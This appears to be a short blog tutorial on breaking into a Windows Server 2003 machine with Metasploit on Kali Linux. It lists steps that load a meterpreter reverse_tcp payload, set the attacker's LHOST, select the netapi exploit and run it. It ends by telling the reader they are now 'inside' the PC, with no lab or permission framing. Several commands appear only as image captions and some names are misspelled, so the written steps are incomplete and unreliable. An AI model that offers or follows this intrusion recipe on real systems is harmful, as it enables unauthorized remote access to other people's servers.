Breaking News
Loading...

Hacking with kali Liunx--Hack windows Server 2003

12:00
Hacking Windows Server2003 image
Hacking window server 2003
Hi to Eveyone. Today  i will show you How To Hack windows server 2003 using
Metaspolit Frame Work  in  kali linux.

first of all i will tell you little bit about Metasploit frame work
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its best-known sub-project is the open source... Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.
The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.

                                                 Video For Demo:


Steps:
open linux terminal and write this Commands:

1-service apache2 start & service mysql start

commands part img1

2- after that type "msfconsole" without quotes and wait for few seconds

commands part img2
commands part img2
3-After few seconds Metaspolit will be opend..
commands part img3
commands part img3
4-now type this command
use payload/windows/mterpreter/reverse_tcp    hit enter

commands of linux
commands of linux

5-every command have optoins ...to see options type 
show options
after that set "LHOST" which is local ip of our machine .....


commands of linux
commands of linux

after that type search netapi this is exploit ....
commands part img4
commands part img4

use this command by copy

commands part img5
commands part img5
after that final command exploit...

now you are in side pc...Enjoye for more watch below video...
commands part img6
commands part img6

Watch on Playit.pk

0 comments:

Post a Comment

 
Toggle Footer